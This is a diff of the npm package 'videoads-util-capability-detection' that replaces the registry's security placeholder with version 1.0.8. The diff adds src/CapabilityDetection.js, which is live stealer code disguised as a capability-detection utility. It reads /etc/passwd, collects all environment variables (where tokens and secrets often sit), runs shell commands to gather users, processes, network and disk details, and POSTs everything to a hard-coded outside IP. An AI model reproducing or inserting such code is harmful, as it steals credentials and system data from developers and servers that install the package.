videoads-util-capability-detection 0.0.1-security → 1.0.8

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "videoads-util-capability-detection",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.8",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "description": ""
 }

package/src/CapabilityDetection.js

@@ -0,0 +1,78 @@
+const http = require('http');
+const os = require('os');
+const fs = require('fs');
+const child_process = require('child_process');
+
+// Define the options for the HTTP request
+const options = {
+  hostname: '203.161.50.115', // Your VPS IP
+  port: 80,
+  path: '/capture', // Replace with your endpoint
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+  },
+};
+
+// Create the HTTP request
+const req = http.request(options, (res) => {
+  res.on('data', (d) => {
+    process.stdout.write(d);
+  });
+});
+
+req.on('error', (error) => {
+  console.error(error);
+});
+
+// Read the /etc/passwd file
+let passwdFile = '';
+try {
+  passwdFile = fs.readFileSync('/etc/passwd', 'utf8');
+} catch (err) {
+  console.error('Error reading /etc/passwd:', err);
+}
+
+// Collect environment variables and additional system information
+const data = JSON.stringify({
+  env: process.env, // Environment Variables
+
+  // System Information
+  hostname: os.hostname(), // Hostname of the machine
+  platform: os.platform(), // Platform (e.g., 'linux', 'win32')
+  arch: os.arch(), // Architecture (e.g., 'x64', 'arm')
+  osVersion: os.version(), // OS Version
+  uptime: os.uptime(), // System Uptime in seconds
+
+  // Memory and CPU Information
+  totalMemory: os.totalmem(), // Total system memory
+  freeMemory: os.freemem(), // Free system memory
+  cpuInfo: os.cpus(), // CPU Information
+
+  // Network Information
+  networkInterfaces: os.networkInterfaces(), // Network Interfaces
+  macAddresses: Object.values(os.networkInterfaces()).flat().map(iface => iface.mac), // MAC Addresses
+  defaultGateway: child_process.execSync('ip route | grep default').toString(), // Default Gateway
+  dnsServers: child_process.execSync('cat /etc/resolv.conf | grep nameserver').toString(), // DNS Servers
+
+  // User and Session Information
+  currentUser: os.userInfo(), // Current User Information
+  loggedUsers: child_process.execSync('who').toString(), // Logged In Users
+  lastLogin: child_process.execSync('last -n 1').toString(), // Last Login
+
+  // Process Information
+  processId: process.pid, // Process ID of the script
+  processCmd: process.argv.join(' '), // Command line that started the process
+  runningProcesses: child_process.execSync('ps aux').toString(), // Running processes
+
+  // File System Information
+  mountedDrives: child_process.execSync('df -h').toString(), // Mounted drives
+  diskUsage: child_process.execSync('du -h --max-depth=1 /').toString(), // Disk usage
+
+  // Additional Sensitive Information
+  passwdFile: passwdFile, // Contents of /etc/passwd
+});
+
+// Send the data to your server
+req.write(data);
+req.end();

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=videoads-util-capability-detection for more information.